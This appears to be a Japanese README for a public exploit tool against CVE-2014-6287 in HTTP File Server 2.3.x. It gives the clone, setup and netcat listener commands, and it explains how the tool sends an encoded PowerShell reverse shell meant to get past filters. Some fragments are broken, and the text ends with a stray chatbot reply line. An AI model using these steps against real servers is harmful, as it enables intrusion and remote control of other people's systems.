
CVE-2014-6287に対応したPythonベースのエクスプロイトで、HTTP File Server 2.3.xに対し、Base64エンコードされたPowerShellペイロードによりリバースシェルを送信します。許可された侵入テスト用。
このリポジトリには、HTTP File Server (HFS) バージョン 2.3.x の CVE-2014-6287 脆弱性を悪用するために設計されたPythonベースのエクスプロイトツールが含まれています。この脆弱性により、攻撃者はサーバー上で任意のコマンドを実行でき、不正アクセスや制御を引き起こす可能性があります。
⚠️ 免責事項:
このツールは教育目的および許可されたペネトレーションテストのみを対象としています。所有していない、または明示的なテスト許可がないシステムに対してこのツールを無断使用することは違法であり、非倫理的です。作者および貢献者は、このツールの誤用や損害について一切の責任を負いません。
nc) が攻撃者のマシンにインストールされていること。リポジトリをクローン:
git clone https://github.com/francescobrina/hfs-cve-2014-6287-exploit.git
cd hfs-cve-2014-6287-exploit
依存関係をインストール:
このスクリプトはPythonの標準ライブラリに依存しています。Python 3.6以上がインストールされていることを確認してください。
python3 --version
Pythonがインストールされていない場合は、公式ウェブサイトからダウンロードするか、パッケージマネージャーを使用してください。
スクリプトを設定:
テキストエディタで exploit.py ファイルを開き、以下の変数を設定します:
lhost = "YOUR_LOCAL_IP" # Your attacker's IP address
lport = 1111 # Port to listen on
rhost = "TARGET_IP" # Target HFS server IP address
rport = 80 # Target HFS server port (default is 80)
Netcatリスナーを起動:
攻撃者のマシンで、リバースシェルを受信するためにNetcatリスナーを起動します:
nc -nlvp 1111
エクスプロイトスクリプトを実行:
Pythonエクスプロイトスクリプトを実行します:
python3 exploit.py
スクリプトはPowerShellコマンドをBase64でエンコードし、対象のHFSサーバーにHTTP GETリクエストを送信し、リバースシェル接続を待機します。
接続を確立:
エクスプロイトが成功すると、Netcatリスナーでリバースシェルを受信できるはずです。
PowerShellコマンドの作成:
スクリプトは、攻撃者のマシン(lhost:lport)へのTCP接続を開始するPowerShellコマンドを構築します。接続後、データを送受信するストリームを作成し、実質的にリバースシェルを確立します。
コマンドのエンコード:
PowerShellコマンドは、UTF-16LEエンコーディングを使用してBase64でエンコードされ、難読化し、潜在的なセキュリティフィルターを回避します。
ペイロードの作成:
エンコードされたコマンドは、対象のHFSサーバーの脆弱なエンドポイントに送信されるHTTP GETリクエストの一部としてペイロードに埋め込まれます。
ペイロードの実行:
HFSサーバーがリクエストを処理すると、PowerShellコマンドをデコードして実行し、攻撃者へのリバースシェルを確立します。
エクスプロイトを実行する前に、以下の設定が正しく設定されていることを確認してください:
lhost: NetcatがリスニングしているマシンのIPアドレス。lport: Netcatがリスニングしているポート番号。rhost: 脆弱なHFSサーバーが実行されている対象マシンのIPアドレス。rport: 対象のHFSサーバーのポート番号(デフォルトは80)。設定例:
lhost = "192.168.1.100"
lport = 1111
rhost = "192.168.1.105"
rport = 80
リバースシェル接続がない場合:
lhost と rhost が正しく設定され、到達可能であることを確認してください。スクリプトエラー:
Netcatの問題:
-nlvp)を使用してください。貢献は歓迎します!問題を発見したり、改善の提案がある場合は、Issueを開くかプルリクエストを送信してください。
リポジトリをフォーク
機能ブランチを作成
git checkout -b feature/YourFeature
変更をコミット
git commit -m "Add Your Feature"
ブランチにプッシュ
git push origin feature/YourFeature
プルリクエストを開く
開発者: Francesco Brina
メール: [email protected]
このプロジェクトはMITライセンスの下でライセンスされています。
免責事項:
このツールは責任を持って、明示的なテスト許可があるシステムでのみ使用してください。作者は、このツールの誤用や損害について一切の責任を負いません。
さらに調整が必要な場合は、お気軽にお知らせください!